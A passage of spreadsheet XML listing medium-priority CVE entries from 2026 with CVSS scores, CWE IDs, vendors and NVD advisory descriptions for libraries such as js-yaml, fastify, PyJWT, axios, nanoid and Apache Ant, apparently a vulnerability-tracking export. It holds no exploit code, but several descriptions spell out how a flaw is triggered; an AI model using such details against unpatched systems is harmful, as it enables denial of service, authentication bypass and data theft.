      </c>
      <c r="H1144" s="5" t="inlineStr"/>
      <c r="I1144" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1144" s="5" t="inlineStr"/>
      <c r="K1144" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="L1144" s="5" t="inlineStr">
        <is>
          <t>js-yaml is a JavaScript YAML parser and dumper. From 3.0.0 until 3.15.2 and 4.3.2, maxTotalMergeKeys in lib/js-yaml/loader.js and lib/loader.js does not count empty mapping sources while processing the merge key &lt;&lt;. An attacker can alias a large sequence of empty mappings into many merge targets, causing O(N * K) processing while totalMergeKeys remains unchanged and the configured resource limit is never reached. A relatively small YAML document can therefore cause prolonged CPU consumption in applications that parse untrusted YAML, and merge processing is enabled by default on these release lines. This issue is fixed in versions 3.15.2 and 4.3.2.</t>
        </is>
      </c>
      <c r="M1144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84375</t>
        </is>
      </c>
    </row>
    <row r="1145">
      <c r="A1145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84382</t>
        </is>
      </c>
      <c r="C1145" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1145" s="5" t="inlineStr"/>
      <c r="F1145" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1145" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1145" s="5" t="inlineStr"/>
      <c r="I1145" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1145" s="5" t="inlineStr"/>
      <c r="K1145" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L1145" s="5" t="inlineStr">
        <is>
          <t>HTTPX2 is a next generation HTTP client for Python. Prior to 2.12.0, the HTTPX2 content decoders in src/httpx2/httpx2/_decoders.py fully inflate each gzip, deflate, br, or zstd network chunk before iter_bytes() or aiter_bytes() yields bounded pieces to the application. A 64 KiB compressed chunk can expand to approximately 64 MiB in one intermediate allocation, so an attacker-controlled or compromised server can cause severe memory pressure or out-of-memory process termination even when the application streams the response. This issue is fixed in version 2.12.0.</t>
        </is>
      </c>
      <c r="M1145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84382</t>
        </is>
      </c>
    </row>
    <row r="1146">
      <c r="A1146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84469</t>
        </is>
      </c>
      <c r="C1146" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1146" s="5" t="inlineStr"/>
      <c r="F1146" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1146" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1146" s="5" t="inlineStr"/>
      <c r="I1146" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1146" s="5" t="inlineStr"/>
      <c r="K1146" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1146" s="5" t="inlineStr">
        <is>
          <t>fastify versions before 5.12.2 decide whether to compile a request schema based on JavaScript truthiness, but JSON Schema Draft 7 defines the boolean false as a valid schema that rejects every instance. When an application assigns false to a route's body, querystring, params, or headers schema to deny all input, fastify treats it as a missing schema, compiles no validator, and runs the route handler on any request. An unauthenticated remote client can therefore reach a handler that a valid deny-all schema was intended to make unreachable, a complete validation bypass that can lead to unauthorized state changes or execution of disabled operations. Users should upgrade to fastify 5.12.2 or later.</t>
        </is>
      </c>
      <c r="M1146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84469</t>
        </is>
      </c>
    </row>
    <row r="1147">
      <c r="A1147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86093</t>
        </is>
      </c>
      <c r="C1147" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1147" s="5" t="inlineStr"/>
      <c r="F1147" s="5" t="inlineStr"/>
      <c r="G1147" s="5" t="inlineStr">
        <is>
          <t>ibm, db2</t>
        </is>
      </c>
      <c r="H1147" s="5" t="inlineStr"/>
      <c r="I1147" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1147" s="5" t="inlineStr"/>
      <c r="K1147" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1147"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M1147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86093</t>
        </is>
      </c>
    </row>
    <row r="1148">
      <c r="A1148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87776</t>
        </is>
      </c>
      <c r="C1148" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1148" s="5" t="inlineStr"/>
      <c r="F1148" s="5" t="inlineStr"/>
      <c r="G1148" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1148" s="5" t="inlineStr"/>
      <c r="I1148" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1148" s="5" t="inlineStr"/>
      <c r="K1148" s="5" t="inlineStr">
        <is>
          <t>CWE-401, CWE-459</t>
        </is>
      </c>
      <c r="L1148"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M1148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87776</t>
        </is>
      </c>
    </row>
    <row r="1149">
      <c r="A1149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87908</t>
        </is>
      </c>
      <c r="C1149" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1149" s="5" t="inlineStr"/>
      <c r="F1149" s="5" t="inlineStr"/>
      <c r="G1149" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1149" s="5" t="inlineStr"/>
      <c r="I1149" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1149" s="5" t="inlineStr"/>
      <c r="K1149" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L1149"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M1149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87908</t>
        </is>
      </c>
    </row>
    <row r="1150">
      <c r="A1150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8862</t>
        </is>
      </c>
      <c r="C1150" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1150" s="5" t="inlineStr"/>
      <c r="F1150" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1150" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1150" s="5" t="inlineStr">
        <is>
          <t>ibm:netezza_performance_server</t>
        </is>
      </c>
      <c r="I1150" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1150" s="5" t="inlineStr"/>
      <c r="K1150" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L1150" s="5" t="inlineStr">
        <is>
          <t>IBM Netezza Software 11.3.0.3 through Interim Fix 002 has credentials that are hardcoded in the application source code, allowing unauthorized access to the container registry. The exposed secret enables attackers to pull private container images, potentially revealing proprietary code, configuration details, and other sensitive information.</t>
        </is>
      </c>
      <c r="M1150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8862</t>
        </is>
      </c>
    </row>
    <row r="1151">
      <c r="A1151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18489</t>
        </is>
      </c>
      <c r="C1151" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D1151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1151" s="5" t="inlineStr"/>
      <c r="F1151" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1151" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1151" s="5" t="inlineStr"/>
      <c r="I1151" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1151" s="5" t="inlineStr"/>
      <c r="K1151" s="5" t="inlineStr">
        <is>
          <t>CWE-488</t>
        </is>
      </c>
      <c r="L1151" s="5" t="inlineStr">
        <is>
          <t>IBM ContextForge MCP Gateway - Translate utility &lt;= 1.0.8 MCP Context Forge could allow a remote attacker to obtain sensitive information from other sessions due to exposure of data elements to the wrong session.</t>
        </is>
      </c>
      <c r="M1151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18489</t>
        </is>
      </c>
    </row>
    <row r="1152">
      <c r="A1152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19651</t>
        </is>
      </c>
      <c r="C1152" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D1152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1152" s="5" t="inlineStr"/>
      <c r="F1152" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1152" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1152" s="5" t="inlineStr"/>
      <c r="I1152" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1152" s="5" t="inlineStr"/>
      <c r="K1152" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1152" s="5" t="inlineStr">
        <is>
          <t>IBM Enterprise Build of Quarkus 3.27.1 through 3.27.5, and 3.33.1 through 3.33.3  could allow an attacker to bypass authorization by manipulating URL query parameters due to incorrect mapping of values to untrusted query string input.</t>
        </is>
      </c>
      <c r="M1152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19651</t>
        </is>
      </c>
    </row>
    <row r="1153">
      <c r="A1153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32589</t>
        </is>
      </c>
      <c r="C1153" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D1153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1153" s="5" t="inlineStr"/>
      <c r="F1153" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1153" s="5" t="inlineStr">
        <is>
          <t>red hat</t>
        </is>
      </c>
      <c r="H1153" s="5" t="inlineStr">
        <is>
          <t>redhat:mirror_registry_for_red_hat_openshift, redhat:quay</t>
        </is>
      </c>
      <c r="I1153" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J1153" s="5" t="inlineStr"/>
      <c r="K1153" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1153" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Red Hat Quay's container image upload process. An authenticated user with push access to any repository on the registry can interfere with image uploads in progress by other users, including those in repositories they do not have access to. This could allow the attacker to read, modify, or cancel another user's in-progress image upload.</t>
        </is>
      </c>
      <c r="M1153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32589</t>
        </is>
      </c>
    </row>
    <row r="1154">
      <c r="A1154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42033</t>
        </is>
      </c>
      <c r="C1154" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D1154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1154" s="5" t="inlineStr"/>
      <c r="F1154" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1154" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1154" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I1154" s="5" t="inlineStr">
        <is>
          <t>2026-04-24</t>
        </is>
      </c>
      <c r="J1154" s="5" t="inlineStr"/>
      <c r="K1154" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-915</t>
        </is>
      </c>
      <c r="L1154" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, when Object.prototype has been polluted by any co-dependency with keys that axios reads without a hasOwnProperty guard, an attacker can (a) silently intercept and modify every JSON response before the application sees it, or (b) fully hijack the underlying HTTP transport, gaining access to request credentials, headers, and body. The precondition is prototype pollution from a separate source in the same process. This vulnerability is fixed in 1.15.1 and 0.31.1.</t>
        </is>
      </c>
      <c r="M1154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42033</t>
        </is>
      </c>
    </row>
    <row r="1155">
      <c r="A1155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48084</t>
        </is>
      </c>
      <c r="C1155" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D1155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1155" s="5" t="inlineStr"/>
      <c r="F1155" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1155" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H1155" s="5" t="inlineStr"/>
      <c r="I1155" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J1155" s="5" t="inlineStr"/>
      <c r="K1155" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="L1155" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Versions prior to 1.0.2 don't throttle failed passphrase login attempts. An attacker can submit unlimited wrong passphrase guesses against any known email address, capped only by the Argon2 verification cost (about 100 milliseconds per attempt on the tested host, giving 10 attempts per second sustained). The same backend implements a working per-account throttle on the WebAuthn challenge endpoint, which returns HTTP 429 after roughly 19 attempts. The passphrase branch simply does not invoke that throttle, leaving a supported high-value login path unprotected against credential stuffing and dictionary attacks. The asymmetry confirms this is an oversight rather than a design choice. The throttle infrastructure exists, is wired into the same auth backend, and works on the WebAuthn path. The passphrase branch in `/api/auth/login` was not updated to record failed attempts. Combined with the application's minimum-passphrase policy (12 characters, no entropy or dictionary checks), accounts using common base patterns such as `Spring2026!XX` or words from a leak corpus are realistically reachable in days on a single CPU, hours on a small GPU farm. Version 1.0.2 patches the issue.</t>
        </is>
      </c>
      <c r="M1155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48084</t>
        </is>
      </c>
    </row>
    <row r="1156">
      <c r="A1156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48526</t>
        </is>
      </c>
      <c r="C1156" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D1156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1156" s="5" t="inlineStr"/>
      <c r="F1156" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1156" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1156" s="5" t="inlineStr">
        <is>
          <t>pyjwt_project:pyjwt</t>
        </is>
      </c>
      <c r="I1156" s="5" t="inlineStr">
        <is>
          <t>2026-05-28</t>
        </is>
      </c>
      <c r="J1156" s="5" t="inlineStr"/>
      <c r="K1156" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-347</t>
        </is>
      </c>
      <c r="L1156" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, when the verifier is decoding JSON Web Tokens, while supporting both asymmetric and HMAC algorithms, the library does not validate use of JSON Web Keys in HMAC algorithm, allowing attacker to use the issuer public key as the secret key for HMAC algorithm. This vulnerability is fixed in 2.13.0.</t>
        </is>
      </c>
      <c r="M1156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48526</t>
        </is>
      </c>
    </row>
    <row r="1157">
      <c r="A1157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54550</t>
        </is>
      </c>
      <c r="C1157" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D1157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1157" s="5" t="inlineStr"/>
      <c r="F1157" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1157" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1157" s="5" t="inlineStr"/>
      <c r="I1157" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1157" s="5" t="inlineStr"/>
      <c r="K1157" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1157" s="5" t="inlineStr">
        <is>
          <t>IzPack is a widely used tool for packaging applications on the Java platform as cross-platform installers. In 5.2.6 and earlier, UnpackerBase.unpack() in izpack-installer/src/main/java/com/izforge/izpack/installer/unpacker/UnpackerBase.java obtains an attacker-controlled PackFile targetPath, passes it through IoHelper.translatePath(), which only converts separators, and constructs a File without normalizing parent-directory segments or enforcing destination containment. A malicious installer pack entry containing ../ sequences can therefore write outside the intended installation directory to startup folders, executable search paths, or other locations accessible with the victim's privileges when the victim runs the installer.</t>
        </is>
      </c>
      <c r="M1157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54550</t>
        </is>
      </c>
    </row>
    <row r="1158">
      <c r="A1158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62906</t>
        </is>
      </c>
      <c r="C1158" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D1158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1158" s="5" t="inlineStr"/>
      <c r="F1158" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1158" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1158" s="5" t="inlineStr"/>
      <c r="I1158" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1158" s="5" t="inlineStr"/>
      <c r="K1158" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L1158" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in Microsoft Discovery Studio allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62906</t>
        </is>
      </c>
    </row>
    <row r="1159">
      <c r="A1159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69347</t>
        </is>
      </c>
      <c r="C1159" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D1159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1159" s="5" t="inlineStr"/>
      <c r="F1159" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1159" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1159" s="5" t="inlineStr"/>
      <c r="I1159" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1159" s="5" t="inlineStr"/>
      <c r="K1159" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1159" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M1159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69347</t>
        </is>
      </c>
    </row>
    <row r="1160">
      <c r="A1160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70604</t>
        </is>
      </c>
      <c r="C1160" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D1160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1160" s="5" t="inlineStr"/>
      <c r="F1160" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1160" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1160" s="5" t="inlineStr"/>
      <c r="I1160" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1160" s="5" t="inlineStr"/>
      <c r="K1160" s="5" t="inlineStr">
        <is>
          <t>CWE-942</t>
        </is>
      </c>
      <c r="L1160" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.10, 40.9.3, 41.4.0, and 42.0.0, a custom scheme registered with supportFetchAPI: true but without corsEnabled: true was not subject to CORS enforcement. A page loaded from a remote origin could therefore fetch() or XMLHttpRequest that scheme cross-origin and read the full response body, rather than the read being blocked. Apps that serve sensitive data from such a scheme and load remote or untrusted content in a renderer are affected. This issue is fixed in versions 39.8.10, 40.9.3, 41.4.0, and 42.0.0.</t>
        </is>
      </c>
      <c r="M1160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70604</t>
        </is>
      </c>
    </row>
    <row r="1161">
      <c r="A1161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73086</t>
        </is>
      </c>
      <c r="C1161" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D1161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1161" s="5" t="inlineStr"/>
      <c r="F1161" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1161" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1161" s="5" t="inlineStr"/>
      <c r="I1161" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1161" s="5" t="inlineStr"/>
      <c r="K1161" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1161" s="5" t="inlineStr">
        <is>
          <t>nanoid is a secure, URL-friendly, unique string ID generator for JavaScript. Prior to versions 3.3.12 and 5.1.11, the nanoid(size) function in index.js and index.cjs coerces the user-influenced size parameter to a signed 32-bit integer, allowing a value of 2147483648 to become -2147483648 and corrupt the process-wide CSPRNG poolOffset in fillPool(), which causes subsequent session tokens, CSRF tokens, API keys, and unique identifiers to become the deterministic string "uuuuuuuuuuuuuuuuuuuuu" until the process restarts. This issue is fixed in versions 3.3.12 and 5.1.11.</t>
        </is>
      </c>
      <c r="M1161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73086</t>
        </is>
      </c>
    </row>
    <row r="1162">
      <c r="A1162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78254</t>
        </is>
      </c>
      <c r="C1162" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D1162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1162" s="5" t="inlineStr"/>
      <c r="F1162" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1162" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1162" s="5" t="inlineStr">
        <is>
          <t>apache:ant</t>
        </is>
      </c>
      <c r="I1162" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1162" s="5" t="inlineStr"/>
      <c r="K1162" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L1162" s="5" t="inlineStr">
        <is>
          <t>The ftp and scp tasks of Apache Ant can download files from a remote server. A malicious server can provide relative paths that allow it to write outside of the dedicated target directory for the download, making it possible to overwrite files of the attacker's choice using the permissions of the user running Ant in versions prior to Ant 1.10.18. 
In order to exploit this vulnerability, the server would either have to be malicious or be subject to a machine-in-the-middle attack. Additionally in the case of scp or the ftp task using ftps the server must pass the server identity checks performed by the tasks.
For ftp tasks not using ftps a malicious server could act as a machine-in-the-middle to provide malicious files.
Starting with Ant 1.10.18 both tasks will prevent writing outside of the destination directory by default. An option is available to disable this behavior in the unlikely case that the  old behavior is required by existing build files.
Mitigations:
Users of scp and ftp (when using ftps) in any version of Ant should not bypass server identity checks. Users of ftp not using ftps should switch to ftps where possible.
All users are recommended to upgrade to Apache Ant 1.10.18, which fixes this issue.</t>
        </is>
      </c>
      <c r="M1162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78254</t>
        </is>
      </c>
    </row>
    <row r="1163">
      <c r="A1163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80434</t>
        </is>
      </c>
      <c r="C1163" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D1163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1163" s="5" t="inlineStr"/>
      <c r="F1163" s="5" t="inlineStr"/>
      <c r="G1163" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1163" s="5" t="inlineStr"/>
      <c r="I1163" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1163" s="5" t="inlineStr"/>
      <c r="K1163" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1163" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to manipulate runtime caches and cause a denial of service due to an insecure direct object reference.</t>
        </is>
      </c>
      <c r="M1163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80434</t>
        </is>
      </c>
    </row>
    <row r="1164">
      <c r="A1164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81383</t>
        </is>
      </c>
      <c r="C1164" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D1164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1164" s="5" t="inlineStr"/>
      <c r="F1164" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1164" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1164" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="I1164" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1164" s="5" t="inlineStr"/>
      <c r="K1164" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="L1164" s="5" t="inlineStr">
        <is>
          <t>Use of incorrectly-resolved name or reference in Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81383</t>
        </is>
      </c>
    </row>
    <row r="1165">
      <c r="A1165" s="5" t="inlineStr">
        <is>
